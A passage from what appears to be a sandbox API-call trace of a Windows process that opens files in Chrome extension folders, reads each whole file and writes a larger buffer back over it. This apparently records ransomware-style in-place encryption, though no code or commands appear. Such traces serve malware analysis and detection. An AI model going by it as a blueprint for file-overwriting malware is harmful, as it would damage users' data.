dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xe0 [0177.608] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.609] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.609] ReleaseMutex (hMutex=0x168) returned 1 [0177.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="page_embed_script.js", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0177.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="page_embed_script.js", cchWideChar=20, lpMultiByteStr=0x1f88b2c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="page_embed_script.js", lpUsedDefaultChar=0x0) returned 20 [0177.609] ReadFile (in: hFile=0x1cc, lpBuffer=0x26c4b98, nNumberOfBytesToRead=0xe0, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4b98*, lpNumberOfBytesRead=0x2e9f2bc*=0xe0, lpOverlapped=0x0) returned 1 [0177.610] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.610] WriteFile (in: hFile=0x1cc, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x668, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2e9f2d0*=0x668, lpOverlapped=0x0) returned 1 [0177.610] CloseHandle (hObject=0x1cc) returned 1 [0177.611] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.611] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.611] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xad [0177.612] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.612] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.612] ReleaseMutex (hMutex=0x168) returned 1 [0177.612] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.612] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.612] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f39618, nNumberOfBytesToRead=0xad, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f39618*, lpNumberOfBytesRead=0x2e9f2bc*=0xad, lpOverlapped=0x0) returned 1 [0177.613] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.613] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x635, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x635, lpOverlapped=0x0) returned 1 [0177.613] CloseHandle (hObject=0x1cc) returned 1 [0177.613] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.614] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.614] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xd4 [0177.614] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.614] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.614] ReleaseMutex (hMutex=0x168) returned 1 [0177.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7360c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.615] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ed1678, nNumberOfBytesToRead=0xd4, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed1678*, lpNumberOfBytesRead=0x2e9f2bc*=0xd4, lpOverlapped=0x0) returned 1 [0177.619] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.619] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x65c, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x65c, lpOverlapped=0x0) returned 1 [0177.620] CloseHandle (hObject=0x1cc) returned 1 [0177.620] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.621] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.621] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x11e [0177.621] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.621] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.621] ReleaseMutex (hMutex=0x168) returned 1 [0177.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.621] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ecc788, nNumberOfBytesToRead=0x11e, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ecc788*, lpNumberOfBytesRead=0x2e9f2bc*=0x11e, lpOverlapped=0x0) returned 1 [0177.622] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.623] WriteFile (in: hFile=0x1cc, lpBuffer=0x2846ab8*, nNumberOfBytesToWrite=0x6a6, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2846ab8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x6a6, lpOverlapped=0x0) returned 1 [0177.623] CloseHandle (hObject=0x1cc) returned 1 [0177.623] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.624] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.624] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x16a [0177.624] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.624] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.624] ReleaseMutex (hMutex=0x168) returned 1 [0177.624] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.624] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7360c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.624] ReadFile (in: hFile=0x1cc, lpBuffer=0x26a93e8, nNumberOfBytesToRead=0x16a, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a93e8*, lpNumberOfBytesRead=0x2e9f2bc*=0x16a, lpOverlapped=0x0) returned 1 [0177.625] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.625] WriteFile (in: hFile=0x1cc, lpBuffer=0x2846ab8*, nNumberOfBytesToWrite=0x6f2, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2846ab8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x6f2, lpOverlapped=0x0) returned 1 [0177.626] CloseHandle (hObject=0x1cc) returned 1 [0177.626] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.626] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.627] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xc6 [0177.627] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.627] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.627] ReleaseMutex (hMutex=0x168) returned 1 [0177.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.627] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ed1678, nNumberOfBytesToRead=0xc6, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed1678*, lpNumberOfBytesRead=0x2e9f2bc*=0xc6, lpOverlapped=0x0) returned 1 [0177.628] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.628] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x64e, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x64e, lpOverlapped=0x0) returned 1 [0177.628] CloseHandle (hObject=0x1cc) returned 1 [0177.628] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.629] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.629] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xb4 [0177.629] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.629] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.629] ReleaseMutex (hMutex=0x168) returned 1 [0177.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7360c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.629] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f39618, nNumberOfBytesToRead=0xb4, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f39618*, lpNumberOfBytesRead=0x2e9f2bc*=0xb4, lpOverlapped=0x0) returned 1 [0177.630] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.630] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x63c, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x63c, lpOverlapped=0x0) returned 1 [0177.631] CloseHandle (hObject=0x1cc) returned 1 [0177.631] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.631] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.632] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x104 [0177.632] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.632] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.632] ReleaseMutex (hMutex=0x168) returned 1 [0177.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.632] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eea868, nNumberOfBytesToRead=0x104, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eea868*, lpNumberOfBytesRead=0x2e9f2bc*=0x104, lpOverlapped=0x0) returned 1 [0177.633] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.633] WriteFile (in: hFile=0x1cc, lpBuffer=0x2846ab8*, nNumberOfBytesToWrite=0x68c, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2846ab8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x68c, lpOverlapped=0x0) returned 1 [0177.633] CloseHandle (hObject=0x1cc) returned 1 [0177.633] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.634] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.634] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x177 [0177.634] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.634] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.634] ReleaseMutex (hMutex=0x168) returned 1 [0177.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7360c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.634] ReadFile (in: hFile=0x1cc, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x177, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x2e9f2bc*=0x177, lpOverlapped=0x0) returned 1 [0177.639] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.639] WriteFile (in: hFile=0x1cc, lpBuffer=0x2846ab8*, nNumberOfBytesToWrite=0x6ff, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2846ab8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x6ff, lpOverlapped=0x0) returned 1 [0177.640] CloseHandle (hObject=0x1cc) returned 1 [0177.640] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.640] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.640] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x32a2e [0177.641] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.641] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.641] ReleaseMutex (hMutex=0x168) returned 1 [0177.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="craw_background.js", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0177.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="craw_background.js", cchWideChar=18, lpMultiByteStr=0x1f8867c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="craw_background.js", lpUsedDefaultChar=0x0) returned 18 [0177.641] ReadFile (in: hFile=0x1cc, lpBuffer=0x2840938, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0177.683] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x31a2e [0177.683] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.731] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x31a2e [0177.732] WriteFile (in: hFile=0x1cc, lpBuffer=0x289dad8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x289dad8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.732] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, 